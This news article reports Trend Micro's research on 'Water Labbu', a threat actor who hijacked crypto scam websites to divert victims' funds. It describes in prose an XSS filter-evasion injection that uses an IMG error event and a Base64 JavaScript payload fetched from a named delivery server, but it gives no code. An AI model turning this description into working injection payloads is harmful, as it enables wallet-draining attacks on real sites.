Researchers in the field of cybersecurity have found a hacker who was responsible for hacking cryptocurrency fraud websites and redirecting cash that had already been stolen to his own wallets. This hacker had previously raked in hundreds of thousands of dollars via this scheme.
According to Trend Micro, a threat actor going by the name “Water Labbu” discovered and penetrated 45 scam websites, then substituted the wallet addresses of the victims with his own. In this manner, whatever money that the con artists manage to mislead other individuals into sending them will ultimately end up in his possession.
The majority of the sites are just bogus mining pools for liquidity. In order to generate a liquidity pool, legitimate cryptocurrency mining pools require their users to lend their digital assets to decentralized exchanges. This allows the pool to operate. Due to the existence of this liquidity pool, cryptocurrency traders are now able to trade their tokens directly (in a decentralized manner, as opposed to a centralized manner where a single entity provides the liquidity). Receiving a cut of the trading fees allows the lenders to generate a profit for themselves.
Users are required to connect their wallets to the liquidity mining pool before they may lend out their cryptocurrency holdings. Fake websites, on the other hand, do little more than wait for users to link their wallets before emptying them out completely. There is a significant amount of work to be done, including the creation of bogus apps as well as participation in social media activities to promote fraud. Water Labbu sidesteps all of it, allowing the original con artists to carry out all of the laborious work on their behalf.
“In one of the examples we investigated, Water Labbu manipulated an IMG element to load a Base64- encoded JavaScript payload via the “error event,” Trend Micro’s study noted.
This is what is known as an XSS evasion method, and it is used to get over Cross-Site Scripting (XSS) filters. The injected payload will then generate another script element, which will load yet another script from the delivery server located at tmpmeta.com.
The script searches for new wallets that have a balance of at least 0.005 ETH or 22,000 USDT, and then, depending on the platform (Windows or one of the two mobile devices), it either performs the transfer or begins the search again.
Trend Micro reminds users that in order to protect themselves from these types of fraud, users should be very careful while linking their wallets and should ensure that they have done their research before handing up any of their tokens.
Read:
- Crypto Scam Alert: The company that raised $660M in ICO just vanished
- Twitter starts crackdown against crypto scammers
- The CNBC-endorsed crypto exchange pulls exit scam on its over 200,000 users
- U.S institutions threatened with bomb attacks by cryptocurrency scammers